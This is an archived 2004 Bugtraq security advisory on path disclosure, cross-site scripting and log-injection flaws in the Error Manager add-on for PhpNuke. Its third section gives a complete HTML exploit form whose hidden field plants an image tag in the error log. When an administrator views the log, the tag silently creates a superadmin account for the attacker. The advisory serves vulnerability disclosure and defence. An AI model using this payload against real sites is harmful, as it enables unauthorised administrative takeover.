[prev in list] [next in list] [prev in thread] [next in thread] 

List:       bugtraq
Subject:    [waraxe-2004-SA#010 - Multiple vulnerabilities in Error Manager
From:       Janek Vind <come2waraxe () yahoo ! com>
Date:       2004-03-18 17:02:29
Message-ID: 20040318170229.17259.qmail () search ! securityfocus ! com
[Download RAW message or body]





{================================================================================}
{                              [waraxe-2004-SA#010]                              }
{================================================================================}
{                                                                                }
{          [ Multiple vulnerabilities in Error Manager v2.1 for PhpNuke ]        }
{                                                                                }
{================================================================================}
                                                                                      \
                
Author: Janek Vind "waraxe"
Date: 18. March 2004
Location: Estonia, Tartu



Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From developer's readme file:

This Error Manager is made by Gijza.net
The idea came from DR3N.tk
This addon is made for PHP-NUKE 6.0. but may work for other versions
Admin CP is also included in this version.
For the latest version go to www.gijza.net


Vulnerabilities:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

1. Full path disclosure 


Let's look at original code:

 //language
if( isset( $newlang ) ) {
   include( "language/error/lang-$newlang.php" );
   $language = $newlang;
} elseif ( isset( $lang ) ) {
   include( "language/error/lang-$lang.php" );
   $language = $lang;
} else {
   include( "language/error/lang-$language.php" );
}

So - nothing will stop us to request this php file directly and this can lead to
standard php error messages, revealing us the full path to error.php file:

http://localhost/nuke71/error.php?newlang=foobar

Warning: main(language/error/lang-foobar.php): failed to open stream: No such file or \
directory in D:\apache_wwwroot\nuke71\error.php on line 19



2. Cross-Site Scripting aka XSS


Again, let's look at original code:


if ($error == 401) {
$pagetitle = "- "._EM401."";
}
if ($error == 403) {
$pagetitle = "- "._EM403."";
}
if ($error == 404) {
$pagetitle = "- "._EM404."";
}
if ($error == 500) {
$pagetitle = "- "._EM500."";
}


This is traditionally coded by using the "switch/case" language constructions, but
for some reason the author uses there "if/if/if/..." construction, not even \
"if/elseif/elseif/else". And we can see, that if variable $error is not the 401, 403, \
404 or 500, but something else, then we can  UNINITIALIZED $pagetitle set to any \
value. This will lead of course to XSS conditions:

http://localhost/nuke71/error.php?pagetitle=[xss code here]


One more way to XSS exploiting:


http://localhost/nuke71/error.php?error=>[xss code here]
 

As with all the PhpNuke XSS cases, using of the POST parameters or even better - \
COOKIE parameters -  will be preffered, because the GET parameters are strictly \
filtered in mainfile.php .



3. Script injection to error log (nasty one!)


This one is my favourite bug. I mean - Error Manager is suppose to log the error \
conditions in web server and therefore admin can find potential bugs on site and of \
course this logging feature will reveale to admin many (unsuccessful) attacks by "bad \
guys". It's shame, but it's true - error logging in Error Manager will log referer, \
request URI , etc, but WITHOUT ANY sanityze against html tags ;) So we can inject any \
javascript code to error log and when admin will browse the logs, the website can be \
compromised - for example cookies can be stealed, additional superadmin accounts can \
be created without the knowledge of the admin (refference to [waraxe-2004-SA#008 - \
easy way to get superadmin rights in PhpNuke 6.x-7.1.0]) etc ...

So, there is an attack scenario:

Write the html file like this one - 


<HTML>
<HEAD><TITLE>Error Manager sploit</TITLE>
</HEAD>
<BODY bgcolor="#000000" text="#FFFFFF">
<br><br><br>
<center>

<FORM action="http://www.victim.com/error.php" method="POST">

<input type="hidden" name="error" value="<img width='0' height='0' border='0' \
src='http://www.victim.com/admin.php?op=AddAuthor&add_aid=attacker&add_name=God&add_pwd=coolpass&add_email=kala@hot.ee&add_radminsuper=1'></img>404">
 <input type="submit" value="Attack">

</FORM>

</center>
<br><br><br>

</BODY>
</HTML>


Use it aginst victim server and then just wait, till admin reads the error log and \
then login to your brand new superadmin account ;)




Greetings:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    Greets to torufoorum staff and to all IT security related people in Estonia! \
Tervitused! Special greets to ulljobu!


Contact:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    come2waraxe@yahoo.com
    Janek Vind "waraxe"

---------------------------------- [ EOF ] ------------------------------------


[prev in list] [next in list] [prev in thread] [next in thread] 

Configure | About | News | Add a list | Sponsored by KoreLogic